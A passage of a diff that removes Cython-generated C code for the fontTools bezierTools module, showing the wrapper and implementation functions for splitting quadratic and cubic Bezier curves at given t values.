__PYX_ERR(0, 589, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("splitQuadraticAtT", 0, 3, 3, 1); __PYX_ERR(0, 589, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 2: - if (likely((values[2] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt3)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[2]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 589, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("splitQuadraticAtT", 0, 3, 3, 2); __PYX_ERR(0, 589, __pyx_L3_error) - } - } - if (unlikely(kw_args > 0)) { - const Py_ssize_t kwd_pos_args = __pyx_nargs; - const Py_ssize_t used_pos_args = (kwd_pos_args < 3) ? kwd_pos_args : 3; - if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, used_pos_args, "splitQuadraticAtT") < 0)) __PYX_ERR(0, 589, __pyx_L3_error) - } - } else if (unlikely(__pyx_nargs < 3)) { - goto __pyx_L5_argtuple_error; - } else { - values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - } - __pyx_v_pt1 = values[0]; - __pyx_v_pt2 = values[1]; - __pyx_v_pt3 = values[2]; - } - goto __pyx_L6_skip; - __pyx_L5_argtuple_error:; - __Pyx_RaiseArgtupleInvalid("splitQuadraticAtT", 0, 3, 3, __pyx_nargs); __PYX_ERR(0, 589, __pyx_L3_error) - __pyx_L6_skip:; - goto __pyx_L4_argument_unpacking_done; - __pyx_L3_error:; - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_DECREF(__pyx_v_ts); __pyx_v_ts = 0; - __Pyx_AddTraceback("fontTools.misc.bezierTools.splitQuadraticAtT", __pyx_clineno, __pyx_lineno, __pyx_filename); - __Pyx_RefNannyFinishContext(); - return NULL; - __pyx_L4_argument_unpacking_done:; - __pyx_r = __pyx_pf_9fontTools_4misc_11bezierTools_30splitQuadraticAtT(__pyx_self, __pyx_v_pt1, __pyx_v_pt2, __pyx_v_pt3, __pyx_v_ts); - - /* function exit code */ - __Pyx_DECREF(__pyx_v_ts); - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_30splitQuadraticAtT(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_pt1, PyObject *__pyx_v_pt2, PyObject *__pyx_v_pt3, PyObject *__pyx_v_ts) { - PyObject *__pyx_v_a = NULL; - PyObject *__pyx_v_b = NULL; - PyObject *__pyx_v_c = NULL; - PyObject *__pyx_r = NULL; - __Pyx_RefNannyDeclarations - PyObject *__pyx_t_1 = NULL; - PyObject *__pyx_t_2 = NULL; - PyObject *__pyx_t_3 = NULL; - int __pyx_t_4; - PyObject *__pyx_t_5 = NULL; - PyObject *__pyx_t_6 = NULL; - PyObject *(*__pyx_t_7)(PyObject *); - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - __Pyx_RefNannySetupContext("splitQuadraticAtT", 1); - - /* "fontTools/misc/bezierTools.py":609 - * ((75, 37.5), (87.5, 25), (100, 0)) - * """ - * a, b, c = calcQuadraticParameters(pt1, pt2, pt3) # <<<<<<<<<<<<<< - * return _splitQuadraticAtT(a, b, c, *ts) - * - */ - __Pyx_GetModuleGlobalName(__pyx_t_2, __pyx_n_s_calcQuadraticParameters); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 609, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_3 = NULL; - __pyx_t_4 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_2))) { - __pyx_t_3 = PyMethod_GET_SELF(__pyx_t_2); - if (likely(__pyx_t_3)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_2); - __Pyx_INCREF(__pyx_t_3); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_2, function); - __pyx_t_4 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[4] = {__pyx_t_3, __pyx_v_pt1, __pyx_v_pt2, __pyx_v_pt3}; - __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_2, __pyx_callargs+1-__pyx_t_4, 3+__pyx_t_4); - __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; - if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 609, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - } - if ((likely(PyTuple_CheckExact(__pyx_t_1))) || (PyList_CheckExact(__pyx_t_1))) { - PyObject* sequence = __pyx_t_1; - Py_ssize_t size = __Pyx_PySequence_SIZE(sequence); - if (unlikely(size != 3)) { - if (size > 3) __Pyx_RaiseTooManyValuesError(3); - else if (size >= 0) __Pyx_RaiseNeedMoreValuesError(size); - __PYX_ERR(0, 609, __pyx_L1_error) - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - if (likely(PyTuple_CheckExact(sequence))) { - __pyx_t_2 = PyTuple_GET_ITEM(sequence, 0); - __pyx_t_3 = PyTuple_GET_ITEM(sequence, 1); - __pyx_t_5 = PyTuple_GET_ITEM(sequence, 2); - } else { - __pyx_t_2 = PyList_GET_ITEM(sequence, 0); - __pyx_t_3 = PyList_GET_ITEM(sequence, 1); - __pyx_t_5 = PyList_GET_ITEM(sequence, 2); - } - __Pyx_INCREF(__pyx_t_2); - __Pyx_INCREF(__pyx_t_3); - __Pyx_INCREF(__pyx_t_5); - #else - __pyx_t_2 = PySequence_ITEM(sequence, 0); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 609, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_3 = PySequence_ITEM(sequence, 1); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 609, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_5 = PySequence_ITEM(sequence, 2); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 609, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_5); - #endif - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - } else { - Py_ssize_t index = -1; - __pyx_t_6 = PyObject_GetIter(__pyx_t_1); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 609, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_7 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_6); - index = 0; __pyx_t_2 = __pyx_t_7(__pyx_t_6); if (unlikely(!__pyx_t_2)) goto __pyx_L3_unpacking_failed; - __Pyx_GOTREF(__pyx_t_2); - index = 1; __pyx_t_3 = __pyx_t_7(__pyx_t_6); if (unlikely(!__pyx_t_3)) goto __pyx_L3_unpacking_failed; - __Pyx_GOTREF(__pyx_t_3); - index = 2; __pyx_t_5 = __pyx_t_7(__pyx_t_6); if (unlikely(!__pyx_t_5)) goto __pyx_L3_unpacking_failed; - __Pyx_GOTREF(__pyx_t_5); - if (__Pyx_IternextUnpackEndCheck(__pyx_t_7(__pyx_t_6), 3) < 0) __PYX_ERR(0, 609, __pyx_L1_error) - __pyx_t_7 = NULL; - __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; - goto __pyx_L4_unpacking_done; - __pyx_L3_unpacking_failed:; - __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; - __pyx_t_7 = NULL; - if (__Pyx_IterFinish() == 0) __Pyx_RaiseNeedMoreValuesError(index); - __PYX_ERR(0, 609, __pyx_L1_error) - __pyx_L4_unpacking_done:; - } - __pyx_v_a = __pyx_t_2; - __pyx_t_2 = 0; - __pyx_v_b = __pyx_t_3; - __pyx_t_3 = 0; - __pyx_v_c = __pyx_t_5; - __pyx_t_5 = 0; - - /* "fontTools/misc/bezierTools.py":610 - * """ - * a, b, c = calcQuadraticParameters(pt1, pt2, pt3) - * return _splitQuadraticAtT(a, b, c, *ts) # <<<<<<<<<<<<<< - * - * - */ - __Pyx_XDECREF(__pyx_r); - __Pyx_GetModuleGlobalName(__pyx_t_1, __pyx_n_s_splitQuadraticAtT); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 610, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_5 = PyTuple_New(3); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 610, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_5); - __Pyx_INCREF(__pyx_v_a); - __Pyx_GIVEREF(__pyx_v_a); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_5, 0, __pyx_v_a)) __PYX_ERR(0, 610, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_b); - __Pyx_GIVEREF(__pyx_v_b); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_5, 1, __pyx_v_b)) __PYX_ERR(0, 610, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_c); - __Pyx_GIVEREF(__pyx_v_c); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_5, 2, __pyx_v_c)) __PYX_ERR(0, 610, __pyx_L1_error); - __pyx_t_3 = PyNumber_Add(__pyx_t_5, __pyx_v_ts); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 610, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; - __pyx_t_5 = __Pyx_PyObject_Call(__pyx_t_1, __pyx_t_3, NULL); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 610, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_5); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_r = __pyx_t_5; - __pyx_t_5 = 0; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":589 - * - * - * def splitQuadraticAtT(pt1, pt2, pt3, *ts): # <<<<<<<<<<<<<< - * """Split a quadratic Bezier curve at one or more values of t. - * - */ - - /* function exit code */ - __pyx_L1_error:; - __Pyx_XDECREF(__pyx_t_1); - __Pyx_XDECREF(__pyx_t_2); - __Pyx_XDECREF(__pyx_t_3); - __Pyx_XDECREF(__pyx_t_5); - __Pyx_XDECREF(__pyx_t_6); - __Pyx_AddTraceback("fontTools.misc.bezierTools.splitQuadraticAtT", __pyx_clineno, __pyx_lineno, __pyx_filename); - __pyx_r = NULL; - __pyx_L0:; - __Pyx_XDECREF(__pyx_v_a); - __Pyx_XDECREF(__pyx_v_b); - __Pyx_XDECREF(__pyx_v_c); - __Pyx_XGIVEREF(__pyx_r); - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -/* "fontTools/misc/bezierTools.py":613 - * - * - * def splitCubicAtT(pt1, pt2, pt3, pt4, *ts): # <<<<<<<<<<<<<< - * """Split a cubic Bezier curve at one or more values of t. - * - */ - -/* Python wrapper */ -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_33splitCubicAtT(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -); /*proto*/ -PyDoc_STRVAR(__pyx_doc_9fontTools_4misc_11bezierTools_32splitCubicAtT, "splitCubicAtT(pt1, pt2, pt3, pt4, *ts)\nSplit a cubic Bezier curve at one or more values of t.\n\n Args:\n pt1,pt2,pt3,pt4: Control points of the Bezier as 2D tuples.\n *ts: Positions at which to split the curve.\n\n Returns:\n A list of curve segments (each curve segment being four 2D tuples).\n\n Examples::\n\n >>> printSegments(splitCubicAtT((0, 0), (25, 100), (75, 100), (100, 0), 0.5))\n ((0, 0), (12.5, 50), (31.25, 75), (50, 75))\n ((50, 75), (68.75, 75), (87.5, 50), (100, 0))\n >>> printSegments(splitCubicAtT((0, 0), (25, 100), (75, 100), (100, 0), 0.5, 0.75))\n ((0, 0), (12.5, 50), (31.25, 75), (50, 75))\n ((50, 75), (59.375, 75), (68.75, 68.75), (77.3438, 56.25))\n ((77.3438, 56.25), (85.9375, 43.75), (93.75, 25), (100, 0))\n "); -static PyMethodDef __pyx_mdef_9fontTools_4misc_11bezierTools_33splitCubicAtT = {"splitCubicAtT", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_9fontTools_4misc_11bezierTools_33splitCubicAtT, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_9fontTools_4misc_11bezierTools_32splitCubicAtT}; -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_33splitCubicAtT(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -) { - PyObject *__pyx_v_pt1 = 0; - PyObject *__pyx_v_pt2 = 0; - PyObject *__pyx_v_pt3 = 0; - PyObject *__pyx_v_pt4 = 0; - PyObject *__pyx_v_ts = 0; - #if !CYTHON_METH_FASTCALL - CYTHON_UNUSED Py_ssize_t __pyx_nargs; - #endif - CYTHON_UNUSED PyObject *const *__pyx_kwvalues; - PyObject* values[4] = {0,0,0,0}; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - PyObject *__pyx_r = 0; - __Pyx_RefNannyDeclarations - __Pyx_RefNannySetupContext("splitCubicAtT (wrapper)", 0); - #if !CYTHON_METH_FASTCALL - #if CYTHON_ASSUME_SAFE_MACROS - __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); - #else - __pyx_nargs = PyTuple_Size(__pyx_args); if (unlikely(__pyx_nargs < 0)) return NULL; - #endif - #endif - __pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); - __pyx_v_ts = __Pyx_ArgsSlice_FASTCALL(__pyx_args, 4, __pyx_nargs); - if (unlikely(!__pyx_v_ts)) { - __Pyx_RefNannyFinishContext(); - return NULL; - } - __Pyx_GOTREF(__pyx_v_ts); - { - PyObject **__pyx_pyargnames[] = {&__pyx_n_s_pt1,&__pyx_n_s_pt2,&__pyx_n_s_pt3,&__pyx_n_s_pt4,0}; - if (__pyx_kwds) { - Py_ssize_t kw_args; - switch (__pyx_nargs) { - default: - case 4: values[3] = __Pyx_Arg_FASTCALL(__pyx_args, 3); - CYTHON_FALLTHROUGH; - case 3: values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - CYTHON_FALLTHROUGH; - case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - CYTHON_FALLTHROUGH; - case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - CYTHON_FALLTHROUGH; - case 0: break; - } - kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); - switch (__pyx_nargs) { - case 0: - if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt1)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[0]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 613, __pyx_L3_error) - else goto __pyx_L5_argtuple_error; - CYTHON_FALLTHROUGH; - case 1: - if (likely((values[1] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt2)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[1]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 613, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("splitCubicAtT", 0, 4, 4, 1); __PYX_ERR(0, 613, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 2: - if (likely((values[2] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt3)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[2]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 613, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("splitCubicAtT", 0, 4, 4, 2); __PYX_ERR(0, 613, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 3: - if (likely((values[3] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt4)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[3]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 613, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("splitCubicAtT", 0, 4, 4, 3); __PYX_ERR(0, 613, __pyx_L3_error) - } - } - if (unlikely(kw_args > 0)) { - const Py_ssize_t kwd_pos_args = __pyx_nargs; - const Py_ssize_t used_pos_args = (kwd_pos_args < 4) ? kwd_pos_args : 4; - if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, used_pos_args, "splitCubicAtT") < 0)) __PYX_ERR(0, 613, __pyx_L3_error) - } - } else if (unlikely(__pyx_nargs < 4)) { - goto __pyx_L5_argtuple_error; - } else { - values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - values[3] = __Pyx_Arg_FASTCALL(__pyx_args, 3); - } - __pyx_v_pt1 = values[0]; - __pyx_v_pt2 = values[1]; - __pyx_v_pt3 = values[2]; - __pyx_v_pt4 = values[3]; - } - goto __pyx_L6_skip; - __pyx_L5_argtuple_error:; - __Pyx_RaiseArgtupleInvalid("splitCubicAtT", 0, 4, 4, __pyx_nargs); __PYX_ERR(0, 613, __pyx_L3_error) - __pyx_L6_skip:; - goto __pyx_L4_argument_unpacking_done; - __pyx_L3_error:; - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_DECREF(__pyx_v_ts); __pyx_v_ts = 0; - __Pyx_AddTraceback("fontTools.misc.bezierTools.splitCubicAtT", __pyx_clineno, __pyx_lineno, __pyx_filename); - __Pyx_RefNannyFinishContext(); - return NULL; - __pyx_L4_argument_unpacking_done:; - __pyx_r = __pyx_pf_9fontTools_4misc_11bezierTools_32splitCubicAtT(__pyx_self, __pyx_v_pt1, __pyx_v_pt2, __pyx_v_pt3, __pyx_v_pt4, __pyx_v_ts); - - /* function exit code */ - __Pyx_DECREF(__pyx_v_ts); - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_32splitCubicAtT(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_pt1, PyObject *__pyx_v_pt2, PyObject *__pyx_v_pt3, PyObject *__pyx_v_pt4, PyObject *__pyx_v_ts) { - PyObject *__pyx_v_a = NULL; - PyObject *__pyx_v_b = NULL; - PyObject *__pyx_v_c = NULL; - PyObject *__pyx_v_d = NULL; - PyObject *__pyx_r = NULL; - __Pyx_RefNannyDeclarations - PyObject *__pyx_t_1 = NULL; - PyObject *__pyx_t_2 = NULL; - PyObject *__pyx_t_3 = NULL; - int __pyx_t_4; - PyObject *__pyx_t_5 = NULL; - PyObject *__pyx_t_6 = NULL; - PyObject *__pyx_t_7 = NULL; - PyObject *(*__pyx_t_8)(PyObject *); - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - __Pyx_RefNannySetupContext("splitCubicAtT", 1); - - /* "fontTools/misc/bezierTools.py":633 - * ((77.3438, 56.25), (85.9375, 43.75), (93.75, 25), (100, 0)) - * """ - * a, b, c, d = calcCubicParameters(pt1, pt2, pt3, pt4) # <<<<<<<<<<<<<< - * return _splitCubicAtT(a, b, c, d, *ts) - * - */ - __Pyx_GetModuleGlobalName(__pyx_t_2, __pyx_n_s_calcCubicParameters); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 633, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_3 = NULL; - __pyx_t_4 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_2))) { - __pyx_t_3 = PyMethod_GET_SELF(__pyx_t_2); - if (likely(__pyx_t_3)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_2); - __Pyx_INCREF(__pyx_t_3); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_2, function); - __pyx_t_4 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[5] = {__pyx_t_3, __pyx_v_pt1, __pyx_v_pt2, __pyx_v_pt3, __pyx_v_pt4}; - __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_2, __pyx_callargs+1-__pyx_t_4, 4+__pyx_t_4); - __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; - if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 633, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - } - if ((likely(PyTuple_CheckExact(__pyx_t_1))) || (PyList_CheckExact(__pyx_t_1))) { - PyObject* sequence = __pyx_t_1; - Py_ssize_t size = __Pyx_PySequence_SIZE(sequence); - if (unlikely(size != 4)) { - if (size > 4) __Pyx_RaiseTooManyValuesError(4); - else if (size >= 0) __Pyx_RaiseNeedMoreValuesError(size); - __PYX_ERR(0, 633, __pyx_L1_error) - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - if (likely(PyTuple_CheckExact(sequence))) { - __pyx_t_2 = PyTuple_GET_ITEM(sequence, 0); - __pyx_t_3 = PyTuple_GET_ITEM(sequence, 1); - __pyx_t_5 = PyTuple_GET_ITEM(sequence, 2); - __pyx_t_6 = PyTuple_GET_ITEM(sequence, 3); - } else { - __pyx_t_2 = PyList_GET_ITEM(sequence, 0); - __pyx_t_3 = PyList_GET_ITEM(sequence, 1); - __pyx_t_5 = PyList_GET_ITEM(sequence, 2); - __pyx_t_6 = PyList_GET_ITEM(sequence, 3); - } - __Pyx_INCREF(__pyx_t_2); - __Pyx_INCREF(__pyx_t_3); - __Pyx_INCREF(__pyx_t_5); - __Pyx_INCREF(__pyx_t_6); - #else - { - Py_ssize_t i; - PyObject** temps[4] = {&__pyx_t_2,&__pyx_t_3,&__pyx_t_5,&__pyx_t_6}; - for (i=0; i < 4; i++) { - PyObject* item = PySequence_ITEM(sequence, i); if (unlikely(!item)) __PYX_ERR(0, 633, __pyx_L1_error) - __Pyx_GOTREF(item); - *(temps[i]) = item; - } - } - #endif - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - } else { - Py_ssize_t index = -1; - PyObject** temps[4] = {&__pyx_t_2,&__pyx_t_3,&__pyx_t_5,&__pyx_t_6}; - __pyx_t_7 = PyObject_GetIter(__pyx_t_1); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 633, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_7); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_8 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_7); - for (index=0; index < 4; index++) { - PyObject* item = __pyx_t_8(__pyx_t_7); if (unlikely(!item)) goto __pyx_L3_unpacking_failed; - __Pyx_GOTREF(item); - *(temps[index]) = item; - } - if (__Pyx_IternextUnpackEndCheck(__pyx_t_8(__pyx_t_7), 4) < 0) __PYX_ERR(0, 633, __pyx_L1_error) - __pyx_t_8 = NULL; - __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; - goto __pyx_L4_unpacking_done; - __pyx_L3_unpacking_failed:; - __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; - __pyx_t_8 = NULL; - if (__Pyx_IterFinish() == 0) __Pyx_RaiseNeedMoreValuesError(index); - __PYX_ERR(0, 633, __pyx_L1_error) - __pyx_L4_unpacking_done:; - } - __pyx_v_a = __pyx_t_2; - __pyx_t_2 = 0; - __pyx_v_b = __pyx_t_3; - __pyx_t_3 = 0; - __pyx_v_c = __pyx_t_5; - __pyx_t_5 = 0; - __pyx_v_d = __pyx_t_6; - __pyx_t_6 = 0; - - /* "fontTools/misc/bezierTools.py":634 - * """ - * a, b, c, d = calcCubicParameters(pt1, pt2, pt3, pt4) - * return _splitCubicAtT(a, b, c, d, *ts) # <<<<<<<<<<<<<< - * - * - */ - __Pyx_XDECREF(__pyx_r); - __Pyx_GetModuleGlobalName(__pyx_t_1, __pyx_n_s_splitCubicAtT); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 634, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_6 = PyTuple_New(4); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 634, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - __Pyx_INCREF(__pyx_v_a); - __Pyx_GIVEREF(__pyx_v_a); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_6, 0, __pyx_v_a)) __PYX_ERR(0, 634, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_b); - __Pyx_GIVEREF(__pyx_v_b); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_6, 1, __pyx_v_b)) __PYX_ERR(0, 634, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_c); - __Pyx_GIVEREF(__pyx_v_c); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_6, 2, __pyx_v_c)) __PYX_ERR(0, 634, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_d); - __Pyx_GIVEREF(__pyx_v_d); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_6, 3, __pyx_v_d)) __PYX_ERR(0, 634, __pyx_L1_error); - __pyx_t_5 = PyNumber_Add(__pyx_t_6, __pyx_v_ts); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 634, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_5); - __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; - __pyx_t_6 = __Pyx_PyObject_Call(__pyx_t_1, __pyx_t_5, NULL); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 634, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; - __pyx_r = __pyx_t_6; - __pyx_t_6 = 0; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":613 - * - * - * def splitCubicAtT(pt1, pt2, pt3, pt4, *ts): # <<<<<<<<<<<<<< - * """Split a cubic Bezier curve at one or more values of t. - * - */ - - /* function exit code */ - __pyx_L1_error:; - __Pyx_XDECREF(__pyx_t_1); - __Pyx_XDECREF(__pyx_t_2); - __Pyx_XDECREF(__pyx_t_3); - __Pyx_XDECREF(__pyx_t_5); - __Pyx_XDECREF(__pyx_t_6); - __Pyx_XDECREF(__pyx_t_7); - __Pyx_AddTraceback("fontTools.misc.bezierTools.splitCubicAtT", __pyx_clineno, __pyx_lineno, __pyx_filename); - __pyx_r = NULL; - __pyx_L0:; - __Pyx_XDECREF(__pyx_v_a); - __Pyx_XDECREF(__pyx_v_b); - __Pyx_XDECREF(__pyx_v_c); - __Pyx_XDECREF(__pyx_v_d); - __Pyx_XGIVEREF(__pyx_r); - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} -static PyObject *__pyx_gb_9fontTools_4misc_11bezierTools_36generator(__pyx_CoroutineObject *__pyx_generator, CYTHON_UNUSED PyThreadState *__pyx_tstate, PyObject *__pyx_sent_value); /* proto */ - -/* "fontTools/misc/bezierTools.py":637 - * - * - * @cython.locals( # <<<<<<<<<<<<<< - * pt1=cython.complex, - * pt2=cython.complex, - */ - -/* Python wrapper */ -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_35splitCubicAtTC(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -); /*proto*/ -PyDoc_STRVAR(__pyx_doc_9fontTools_4misc_11bezierTools_34splitCubicAtTC, "splitCubicAtTC(double complex pt1, double complex pt2, double complex pt3, double complex pt4, *ts)\nSplit a cubic Bezier curve at one or more values of t.\n\n Args:\n pt1,pt2,pt3,pt4: Control points of the Bezier as complex numbers..\n *ts: Positions at which to split the curve.\n\n Yields:\n Curve segments (each curve segment being four complex 